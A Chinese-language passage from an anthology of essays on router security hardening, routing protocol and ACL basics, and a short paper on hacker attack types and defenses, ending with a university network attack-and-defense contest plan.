为了使路由器将合法信息完整、及时、安全地转发到目的地，许多路由器厂商开始在路由器中添加安全模块，比如将防火墙、vpn、ids、防病毒、url过滤等技术引入路由器当中，于是出现了路由器与安全设备融合的趋势。从本质上讲，增加安全模块的路由器，在路由器功能实现方面与普通路由器没有区别，所不同的是，添加安全模块的路由器可以通过加密、认证等技术手段增强报文的安全性，与专用安全设备进行有效配合，来提高路由器本身的安全性和所管理网段的可用性。

而为了保护路由器安全，我们还必需考虑路由器的配置问题。一般来说路由器的配置方式可以通过用主控c termianl)telnet配置；可以从tftp server上下载配置，另外，还可以用网管工作站进行配置。路由器攻击造成的最大威胁是网络无法使用，而且这类攻击需要动用大量靠近骨干网络的服务器。其实，路由器有一个操作系统，也是一个软件，相对其他操作系统的技术性来说，差距是非常明显的，由于功能单一，不考虑兼容性和易用性等，核心固化，一般管理员不允许远程登录，加上了解路由器的人少得很，所以它的安全问题不太明显，有时候偶尔出现死机状态，管理员一般使用reboot命令后，也就没什么问题了。

也正因为这样，致使很多路由器的管理员对这个不怎么关心，只要网络畅通就可以了，因为路由器通常都是厂家负责维护的。甚至有些厂家总爱附带一句说:“如果忘记了口令，请和经销商联系。”事实上，连unix都有很多漏洞，何况路由器脆弱的操作系统?当然路由器一般是无法渗入的。因为，你无法远程登录，一般管理员都不会开的。但是让路由器拒绝服务的漏洞很多。而且，很多管理员有个毛病，他们往往对windows的操作系统补丁打得比较勤，但是对路由器的操作系统的补丁，很多管理员都懒得去理。

路由器五大类安控技术

访问控制技术：用户验证是实现用户安全防护的基础技术，路由器上可以采用多种用户接入的控制手段，如ppp、web登录认证、acl、802.1x协议等，保护接入用户不受网络攻击，同时能够阻止接入用户攻击其他用户和网络。基于ca标准体系的安全认证，将进一步加强访问控制的安全性。

传输加密技术：ipsec是路由器常用的协议，借助该协议，路由器支持建立虚拟专用网（vpn）。ipsec协议包括esp（encapsulating security payload）封装安全负载、ah（authentication header）报头验证协议及ike，密钥管理协议等，可以用在公共ip网络上确保数据通信的可靠性和完整性，能够保障数据安全穿越公网而没有被侦听。由于ipsec的部署简便，只需安全通道两端的路由器或主机支持ipsec协议即可，几乎不需对网络现有基础设施进行更动，这正是ipsec协议能够确保包括远程登录、客户机、服务器、电子邮件、文件传输及web访问等多种应用程序安全的重要原因。

防火墙防护技术：采用防火墙功能模块的路由器具有报文过滤功能，能够对所有接收和转发的报文进行过滤和检查，检查策略可以通过配置实现更改和管理。路由器还可以利用nat/pat功能隐藏内网拓扑结构，进一步实现复杂的应用网关（alg）功能，还有一些路由器提供基于报文内容的防护。原理是当报文通过路由器时，防火墙功能模块可以对报文与指定的访问规则进行比较，如果规则允许，报文将接受检查，否则报文直接被丢弃，如果该报文是用于打开一个新的控制或数据连接，防护功能模块将动态修改或创建规则，同时更新状态表以允许与新创建的连接相关的报文，回来的报文只有属于一个已经存在的有效连接，才会被允许通过。

入侵检测技术：在安全架构中，入侵检测（ids）是一个非常重要的技术，目前有些路由器和高端交换机已经内置ids功能模块，内置入侵检测模块需要路由器具备完善的端口镜像（一对一、多对一）和报文统计支持功能。

ha（高可用性）：提高自身的安全性，需要路由器能够支持备份协议（如vrrp）和具有日志管理功能，以使得网络数据具备更高的冗余性和能够获取更多的保障。

入侵路由器的手法及其对策

通常来说，黑客攻击路由器的手段与袭击网上其它计算机的手法大同小异，因为从严格的意义上讲路由器本身就是一台具备特殊使命的电脑，虽然它可能没有人们通常熟识的pc那样的外观。一般来讲，黑客针对路由器的攻击主要分为以下两种类型：一是通过某种手段或途径获取管理权限，直接侵入到系统的内部；一是采用远程攻击的办法造成路由器崩溃死机或是运行效率显著下降。相较而言，前者的难度要大一些。

在第一种入侵方法中，黑客一般是利用系统用户的粗心或已知的系统缺陷（例如系统软件中的“臭虫”）获得进入系统的访问权限，并通过一系列进一步的行动最终获得超级管理员权限。黑客一般很难一开始就获得整个系统的控制权，在通常的情况下，这是一个逐渐升级的入侵过程。由于路由器不像一般的系统那样设有众多的用户账号，而且经常使用安全性相对较高的专用软件系统，所以黑客要想获取路由器系统的管理权相对于入侵一般的主机就要困难得多。

因此，现有的针对路由器的黑客攻击大多数都可以归入第二类攻击手段的范畴。这种攻击的最终目的并非直接侵入系统内部，而是通过向系统发送攻击性数据包或在一定的时间间隔里，向系统发送数量巨大的“垃圾”数据包，以此大量耗费路由器的系统资源，使其不能正常工作，甚至彻底崩溃。

路由器是内部网络与外界的一个通信出口，它在一个网络中充当着平衡带宽和转换ip地址的作用，实现少量外部ip地址数量让内部多台电脑同时访问外网，一旦黑客攻陷路由器，那么就掌握了控制内部网络访问外部网络的权力，而且如果路由器被黑客使用拒绝服务攻击，将造成内部网络不能访问外网，甚至造成网络瘫痪。具体来说，我们可以实施下面的对策：

为了防止外部icmp重定向欺骗，我们知道攻击者有时会利用icmp重定向来对路由器进行重定向，将本应送到正确目标的信息重定向到它们指定的设备，从而获得有用信息。禁止外部用户使用icmp重定向的命令是：interface serial0 no ip redirects。

在防止外部源路由欺骗时，我们知道源路由选择是指使用数据链路层信息来为数据报进行路由选择。该技术跨越了网络层的路由信息，使入侵者可以为内部网的数据报指定一个非法的路由，这样原本应该送到合法目的地的数据报就会被送到入侵者指定的地址。禁止使用源路由的命令：no ip source-route。

如何防止盗用内部ip地址呢？由于攻击者通常可能会盗用内部ip地址进行非法访问，针对这一问题，可以利用cisco路由器的arp命令将固定ip地址绑定到某一mac地址之上。具体命令：arp 固定ip地址 mac地址 arpa。

而要在源站点防止smurf，关键则是阻止所有的向内回显请求，这就要防止路由器将指向网络广播地址的通信映射到局域网广播地址。可以在lan接口方式中输入命令：no ip directed-broadcast。

篇7：网络工程师绝密资料

路由器问题：

1、什么时候使用多路由协议？

当两种不同的路由协议要交换路由信息时，就要用到多路由协议，当然，路由再分配也可以交换路由信息。下列情况不必使用多路由协议：

从老版本的内部网关协议（ Interior Gateway Protocol，I G P）升级到新版本的I G P。

你想使用另一种路由协议但又必须保留原来的协议。

你想终止内部路由，以免受到其他没有严格过滤监管功能的路由器的干扰。

你在一个由多个厂家的路由器构成的环境下。

什么是距离向量路由协议？

距离向量路由协议是为小型网络环境设计的。在大型网络环境下，这类协议在学习路由及保持路由将产生较大的流量，占用过多的带宽。如果在9 0秒内没有收到相邻站点发送的路由选择表更新，它才认为相邻站点不可达。每隔30秒，距离向量路由协议就要向相邻站点发送整个路由选择表，使相邻站点的路由选择表得到更新。这样，它就能从别的站点（直接相连的或其他方式连接的）收集一个网络的列表，以便进行路由选择。距离向量路由协议使用跳数作为度量值，来计算到达目的地要经过的路由器数。

例如，R I P使用B e l l m a n - F o r d算法确定最短路径，即只要经过最小的跳数就可到达目的地的线路。最大允许的跳数通常定为1 5。那些必须经过1 5个以上的路由器的终端被认为是不可到达的。

距离向量路由协议有如下几种： IP RIP、IPX RIP、A p p l e Talk RT M P和I G R P。

什么是链接状态路由协议？

链接状态路由协议更适合大型网络，但由于它的复杂性，使得路由器需要更多的C P U资源。它能够在更短的时间内发现已经断了的链路或新连接的路由器，使得协议的会聚时间比距离向量路由协议更短。通常，在1 0秒钟之内没有收到邻站的H E L LO报文，它就认为邻站已不可达。一个链接状态路由器向它的邻站发送更新报文，通知它所知道的所有链路。它确定最优路径的度量值是一个数值代价，这个代价的值一般由链路的带宽决定。具有最小代价的链路被认为是最优的。在最短路径优先算法中，最大可能代价的值几乎可以是无限的。

如果网络没有发生任何变化，路由器只要周期性地将没有更新的路由选择表进行刷新就可以了（周期的长短可以从3 0分钟到2个小时）。

链接状态路由协议有如下几种： IP OSPF、IPX NLSP和I S - I S。

一个路由器可以既使用距离向量路由协议，又使用链接状态路由协议吗？

可以。每一个接口都可以配置为使用不同的路由协议；但是它们必须能够通过再分配路由来交换路由信息。（路由的再分配将在本章的后面进行讨论。）

2、什么是访问表？

访问表是管理者加入的一系列控制数据包在路由器中输入、输出的规则。它不是由路由器自己产生的。访问表能够允许或禁止数据包进入或输出到目的地。访问表的表项是顺序执行的，即数据包到来时，首先看它是否是受第一条表项约束的，若不是，再顺序向下执行；如果它与第一条表项匹配，无论是被允许还是被禁止，都不必再执行下面表项的检查了。

每一个接口的每一种协议只能有一个访问表。

支持哪些类型的访问表？

一个访问表可以由它的编号来确定。具体的协议及其对应的访问表编号如下：

◎I P标准访问表编号：1～9 9

◎I P扩展访问表编号：1 0 0～1 9 9

◎I P X标准访问表编号：8 0 0～8 9 9

◎I P X扩展访问表编号：1 0 0 0～1 0 9 9

◎AppleTa l k访问表编号：6 0 0～6 9 9

提示在Cisco IOS Release11.2或以上版本中，可以用有名访问表确定编号在1～199的访问表。

如何创建IP标准访问表？

一个I P标准访问表的创建可以由如下命令来完成： Access-list access list number {permit | deny} source [source-mask]

在这条命令中：

◎access list number：确定这个入口属于哪个访问表，

它是从1到9 9的数字。

◎permit | deny：表明这个入口是允许还是阻塞从特定地址来的信息流量。

◎source：确定源I P地址。

◎s o u r c e - m a s k：确定地址中的哪些比特是用来进行匹配的。如果某个比特是“1”，表明地址中该位比特不用管，如果是“0”的话，表明地址中该位比特将被用来进行匹配。可以使用通配符。

以下是一个路由器配置文件中的访问表例子：

Router# show access-lists

Standard IP access list 1

deny 204.59.144.0, wildcard bits 0.0.0.255

permit any

3、什么时候使用路由再分配？

路由再分配通常在那些负责从一个自治系统学习路由，然后向另一个自治系统广播的路由器上进行配置。如果你在使用I G R P或E I G R P，路由再分配通常是自动执行的。

4、什么是管理距离？

管理距离是指一种路由协议的路由可信度。每一种路由协议按可靠性从高到低，依次分配一个信任等级，这个信任等级就叫管理距离。对于两种不同的路由协议到一个目的地的路由信息，路由器首先根据管理距离决定相信哪一个协议。

5、如何配置再分配？

在进行路由再分配之前，你必须首先：

1) 决定在哪儿添加新的协议。

2) 确定自治系统边界路由器（ASBR）。

3) 决定哪个协议在核心，哪个在边界。

4) 决定进行路由再分配的方向。

可以使用以下命令再分配路由更新（这个例子是针对OSPF的）：

router(config-router)#redistribute protocol [process-id] [metric metric - value ] [metric-type type - value ] [subnets]

在这个命令中：

◎protocol：指明路由器要进行路由再分配的源路由协议。

主要的值有： bgp、eqp、igrp、isis、ospf、static [ ip ]、connected和rip。

◎process-id：指明OSPF的进程ID。

◎metric：是一个可选的参数，用来指明再分配的路由的度量值。缺省的度量值是0。

6、为什么确定毗邻路由器很重要？

在一个小型网络中确定毗邻路由器并不是一个主要问题。因为当一个路由器发生故障时，别的路由器能够在一个可接受的时间内收敛。但在大型网络中，发现一个故障路由器的时延可能很大。知道毗邻路由器可以加速收敛，因为路由器能够更快地知道故障路由器，因为hello报文的间隔比路由器交换信息的间隔时间短。

使用距离向量路由协议的路由器在毗邻路由器没有发送路由更新信息时，才能发现毗邻路由器已不可达，这个时间一般为10～90秒。而使用链接状态路由协议的路由器没有收到hello报文就可发现毗邻路由器不可达，这个间隔时间一般为10秒钟。

距离向量路由协议和链接状态路由协议如何发现毗邻路由器？

使用距离向量路由协议的路由器要创建一个路由表（其中包括与它直接相连的网络），同时它会将这个路由表发送到与它直接相连的路由器。毗邻路由器将收到的路由表合并入它自己的路由表，同时它也要将自己的路由表发送到它的毗邻路由器。使用链接状态路由协议的路由器要创建一个链接状态表，包括整个网络目的站的列表。在更新报文中，每个路由器发送它的整个列表。当毗邻路由器收到这个更新报文，它就拷贝其中的内容，同时将信息发向它的邻站。在转发路由表内容时没有必要进行重新计算。

注意使用IGRP和EIGRP的路由器广播hello报文来发现邻站，同时像OSPF一样交换路由更新信息。EIGRP为每一种

篇8：计算机网络hei客与网络攻防技术论文

计算机网络hei客与网络攻防技术论文

【摘要】现阶段人们对计算机网络技术的应用依赖愈来愈强，计算机网络技术的应用给人们的生活以及工作带来了诸多便利，但是在技术的应用中由于多方面因素影响，存在着安全隐患，其中x客的攻击是比较突出的安全威胁。本文主要就计算机网络x客的攻击进行阐述，并就计算机网络安全防护技术应用加以详细探究。

【关键词】计算机网络;x客攻击;防护技术

引言

在网络技术的迅猛发展过程中，随着技术的广泛应用，网络安全问题也愈来愈突出，x客攻击的形式以及活动也呈现出多样化的趋势，加强x客攻击网络的防护技术应用就显得比较关键。通过从理论上深化x客攻防技术的应用研究，就能为解决实际x客攻击问题起到一定启示作用。

一、计算机网络x客攻击的问题分析

在计算机网络的应用过程中，x客攻击问题是比较突出的，随着x客自身的技术水平提高，网络攻击的方式也呈现出多样化，主要的网络攻击形式有以下几种：其一，阻断服务攻击方式。在计算机网络x客的攻击方式当中，阻断服务是比较常见的，这一攻击的方式不是以获得信息作为目的，而是进行阻断主机某服务，使用户不能正常的上网，这一攻击多是利用系统漏洞进行，在将系统的有限资源占用尽之后就会造成不能提供正常服务[1]。当前出现的阻断服务的方式也向着多样化方向迈进，如分布式阻断服务攻击，给计算机用户正常使用网络带来直接影响。其二，监听攻击方式。计算机网络x客通过网络监听的方式实施攻击，这也是比较常见的攻击方式之一。监听网络攻击，主要是对计算机系统以及网络信息包监听来获得相应信息，这一攻击方式对计算机系统并不会造成破坏，但这是攻击网络前的准备动作，通过获得想要的信息如账号及密码等，随后进行展开网络的攻击来实现其不法目的。其三，恶意程序代码攻击方式。在计算机网络的应用过程中，在恶意程序码的因素影响下，对计算机系统的破坏就比较严重[2]。x客在利用这一方式进行展开攻击的时候，主要是通过外部设备以及网络将恶意程序代码安装到系统当中，这一攻击的方式应用主要是通过病毒以及后门程序来实施，病毒的复制性越强，造成的破坏力度就越大，在将病毒安装到系统后，通过病毒来进行破坏以及感染其他计算机系统，这样就达到破坏系统的目的。而在后门程序的攻击方式实施下，主要是入侵后为方便下次侵入安装后门程序。其四，漏洞攻击方式。在计算机网络x客的攻击方式应用过程中，漏洞攻击也是比较常见的，这是因为程序在设计实现以及操作上存在漏洞，x客利用了这些漏洞获得用户权限甚至是系统管理者权限，或是对计算机系统进行破坏。缓冲区溢出是程序实现上比较常见的错误，x客正是利用这些漏洞侵入系统来获得自己想要的信息。

二、计算机网络x客攻击防护技术应用

计算机网络x客攻击防护要注重其适用性，结合实际的情况针对性的应用，笔者就x客防护技术的应用提出几点措施：第一，密码技术的应用。计算机网络x客攻击的防护措施中，密码技术的应用是比较关键的，为实施加密，中间起到媒介作用的就是密钥，密钥有公钥和私钥之分。私钥就是对称密码，公钥是非对称密码。加强计算机网络系统的密码技术应用，对计算机的通讯数据就能实施加密处理，这样能防止x客的监听以及攻击，能有效保障数据的安全可靠性[3]。当前使用比较广泛的是RSA。第二，加强安全监控技术的应用。在计算机网络x客攻击防护技术应用过程中，安全监控技术的应用是比较重要的，这是通过实时监控网络以及主机活动的方式，对用户以及系统的状态行为进行监视，这样就能及时发现计算机系统的配置以及漏洞，并能及时性的.对数据完整以及系统完整加以评估，有效识别攻击行为，能对异常的行为实施统计以及跟踪，这样就能保障计算机系统网络的安全使用。第三，身份认证技术的应用。计算机网络x客防护技术的应用当中，采用身份认证技术也能起到良好作用，这是确认操作者身份的技术[4]。计算机网络中的信息都是采用一组特定数据进行表示的，计算机识别用户数字身份，对用户授权，也就是针对用户数字身份授权，通过身份认证技术的应用，就能有效保障操作者物理身份以及数字身份的对应，身份认证技术的应用也是网络资源防护的首要关口，对保障网络应用的安全有着积极作用。

三、结语

综上所述，加强计算机网络x客攻击防护技术的科学应用，就要从多方面进行考虑，保障防护技术应用的作用充分发挥。通过此次对计算机网络x客的攻击形式的研究分析，以及提出几点防护的措施，希望能有助于解决实际的网络安全问题。

参考文献

[1]陈万,王曙霞,朱思志,孙焕胜,吴江.浅谈x客入侵网站的攻防策略[J].电脑知识与技术.(20)

[2]王萍霞.网络x客休想靠近我[J].电脑应用文萃.(09)

[3]梁斌.x客攻击网站常用的技术及方法[J].中国高新技术企业.2016(08)

[4]卢凤君.网络x客的伦理问题研究[J].科学咨询(科技管理).2016(07)

篇9：校园IT文化节之网络攻防大赛活动策划书

校园IT文化节之网络攻防大赛活动策划书

一、活动主题：

网络攻防大赛

二、活动介绍：

金秋时节，校园it文化节之“网络攻防大赛”开始接受报名了！大赛融集了许多对网络攻防技术感兴趣、有信心的学子，开展了一系列笔试，实战，方案策划考验。只要你有梦想，就可以组队报名参加这次比赛，在比赛中展现你们的实力，体现知识的力量，实现你们的梦想！还不赶快报名！让我们离梦想更近一步，让我们去闯荡一番，留下在东软网络攻防上历史性的辉煌一笔。

三、主办单位：

华南师范大学南海校区商务贸易协会

四、参赛对象：

华南师范大学在校大学生

五、比赛规则：

进行服务器的攻防大战，服务器由主办方提供。

六、竞赛方式：

初试阶段：笔试，有关计算机网络安全知识?复赛、决赛阶段：上机实际操作。

七、活动时间：

报名xx年11月1日--xx年11月9日，比赛xx年11月10日--xx年11月20日

八、奖励方式：

（1）“一等奖”一名奖金：XX元（荣誉证书、精美礼品/人、200元培训券/人）

（2）“二等奖”两名奖金：800元（荣誉证书、200元培训券/人）

（3）“三等奖”三名奖金：400元（荣誉证书、200元培训券/人）

（4）“优胜奖”六名奖金：50元（证书+奖品）

九、报名：

参赛报名方式：以组队方式参加报名每队队员人数，1-5人一组，没有系别、专业、本专科的限制。

时间：即日起到xx年11月9日

电子报名：学生活动中心303室星期一至星期五中午12：30——13：30索取报名表，并于11月9日前于值班时间上交到学生活动中心社团办公室303室。也可至南海东软学院ab栋之间获取报名表。